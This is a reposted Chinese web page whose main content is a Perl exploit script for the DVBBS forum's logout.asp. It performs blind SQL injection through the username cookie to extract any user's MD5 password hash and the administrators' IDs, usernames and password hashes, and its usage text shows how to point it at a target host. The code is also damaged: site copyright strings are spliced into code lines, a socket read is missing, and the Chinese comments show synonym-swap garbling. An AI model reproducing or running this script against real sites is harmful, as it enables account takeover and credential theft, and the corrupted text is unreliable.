获取任意用户MD5加密信息的测试程序

  获取恣意用户MD5加密信息的测试步伐：
  #!/usr/bin/perl
  #Codz By PsKey<PsKey@hotmail.com>
  #Exploit of DVBBS's logout.asp
  #--------------------------------------------------------------------------
  #  本剧本针对动网论坛logout.asp文件缺陷而写，可以推算出所有用户
  #  MD5加密密码；另外可以主动破解后台管理员ID、username、password
  #  剧本参照最新版本编写，若低版本呈现不克不及用的情况，请自行修改步伐
  #  剧本利用方法：
  #  1：在目标论坛以 ilikecat/catlikeme 注册一用户，并得到此用户的 userid
  #  2：再另注册一恣意用户(此步不行少)
  #  3：运转剧本，按资助输出下令参数
  #  要是是MSSQL版，请把这段糟糕的剧本扔到一边
  #--------------------------------------------------------------------------
  $|=1;
  use Socket;
  use Getopt::Std;
  getopt('hpwium');
  print "\n             ===================================================\n";
  print "                       Exploit of DVBBS's logout.asp\n";
  print "                     Codz By PsKey     \n";
  print "                       http://www.isgrey.com/ && c4st.51.net              \n";
  print "                       Thanx Envymask<130\@21cn.com>            \n";
  print "             ===================================================\n";
  &usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));
  $host=$opt_h;
  $port=$opt_p||80;
  $path=$opt_w;
  $userid=$opt_i;
  $user=$opt_u;
  $mode=$opt_m;
  if ($opt_m eq "p") {
  &usage unless defined($opt_u);
  print "\nPlease wait...\n\n";
  for ($j=1;$j<=16;$j++) {
  @dic1=(0..9);
  @dic2=(a..f);
  @dic=(@dic1,@dic2);
  &first;
  for ($i=0;$i<@dic;$i++) {
  print "$dic[$i]";
  $key=$pws.$dic[$i];
  $target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  $th=$j.th;
  print "\n\/\/------------The $th word of the password is $dic[$i]";
  $pws=$pws.$dic[$i];
  last;
  }
  }
  }
  print "\n\nSuccessful,the full password of $user is $pws.\n";
  }
  elsif ($opt_m eq "b") {
  #Crack ID
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";
  &first;
  for ($i=0;$i<=50;$i++) {
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  print "\n--------->>There is one admin's id $i";
  push (@id,$i);
  &first;
  }
  }
  print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";
  sleep(2);
  #Crack the length of admin's username
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";
  for ($j=0;$j<@id;$j++) {
  print "  \|\-\>cracking username's length which id is $id[$j] ...";
  &first;
  for ($i=0;$i<=50;$i++) {
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  print "\n--------->>The length of $id[$j] is $i";
  push (@len,$i);=版权所有  软件 下载  学院  版权所有=
  &first;
  last;
  }
  }
  }
  print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";
  sleep(2);
  #Crack admin's username
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";
  @dic1=(0..9);
  @dic2=(a..z);
  @dic=(@dic1,@dic2);
  for ($j=0;$j<@id;$j++) {
  $pws="";
  print "  \|\-\>cracking username which id is $id[$j] ...";
  OUTER: for ($k=1;$k<=$len[$j];$k++) {
  &first;
  USERNAME: for ($i=0;$i<@dic;$i++) {
  print "$dic[$i].";
  $key=$pws.$dic[$i];
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  $th=$k.th;
  print "\n--------->>The $th word of $id[$j] username is $dic[$i]";
  $pws=$pws.$dic[$i];
  last USERNAME;
  }
  if ($dic[$i] eq "z") {
  print "\ni can't crack this admin's name,maybe it is chinese.\n";
  push (@user,"\?");
  last OUTER;
  }
  }
  }
  push (@user,$pws);
  print "\n========>>The username is $pws which id is $id[$j]\n";
  }
  print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";
  sleep(2);
  #Crack admin's password
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";
  @dic1=(0..9);
  @dic2=(a..f);
  @dic=(@dic1,@dic2);
  for ($j=0;$j<@id;$j++) {
  $pws="";
  print "  \|\-\>cracking password which id is $id[$j] ...";
  for ($k=1;$k<=16;$k++) {
  &first;
  PASSWORD: for ($i=0;$i<@dic;$i++) {
  print "$dic[$i].";
  $key=$pws.$dic[$i];
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  $th=$k.th;
  print "\n--------->>The $th word of $id[$j] password is $dic[$i]";
  $pws=$pws.$dic[$i];
  last PASSWORD;
  }
  }
  }
  push (@pass,$pws);
  print "\n\n========>>The password is $pws which id is $id[$j]\n\n";
  }
  print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";
  print "We got them now:\n";
  printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);
  for ($i=0;$i<@id;$i++) {
  printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);
  }
  }
  else {
  &usage;
  }
  sub first {
  $str="username=ilikecat&password=catlikeme&CookieDate=1";
  $len=length($str);
  $req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
  "Referer: http://$host$path/login.asp\n".
  "Host: $host\n".
  "Content-Length: $len\n".
  "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".
  "\n".
  "$str\n\n";
  print "\n.";
  sendraw($req);
  $req0 = "GET $path/index.asp HTTP/1.0\n".
  "Referer: http://$host$path/index.asp\n".
  "Host: $host\n".
  "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
  print ".\n";
  sendraw($req0);
  }
  sub second {
  $req1 = "GET $path/logout.asp HTTP/1.0\n".
  "Host: $host\n".
  "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
  print ".";
  @res = sendraw($req1);
  $req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
  "Referer: http://$host$path/index.asp?action=show \n".
  "Host: $host\n".
  "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
  print ".";
  @in = sendraw($req2);
  }
  sub usage {
  print qq~
  Usage: $0 -h [-p ] -w -i -m [-u ]
  -h   =hostname you want to attack
  -p   =port,80 default
  -w   =the web path such as "/dvbbs"
  -i   =the userid of ilikecat
  -m   =only two choice,b and p(This option need -u)
  -u   =the user you want to crack
  Eg: 1.Crack proscenium
  $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m p -u admin 
  2.Crack background
  $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m b
  ~;
  exit;
  }
  sub sendraw {
  my ($req) = @_;
  my $target;
  $target = inet_aton($host) || die("inet_aton problems\n");
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
  if(connect(S,pack "SnA4x8",2,$port,$target)){
  select(S);
  $| = 1;
  print $req;
  my @res = ;
  select(STDOUT);
  close(S);
  return @res;
  }
  else { =版权所有  软件 下载  学院  版权所有=
  die("Can't connect...\n");
  }
  }
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：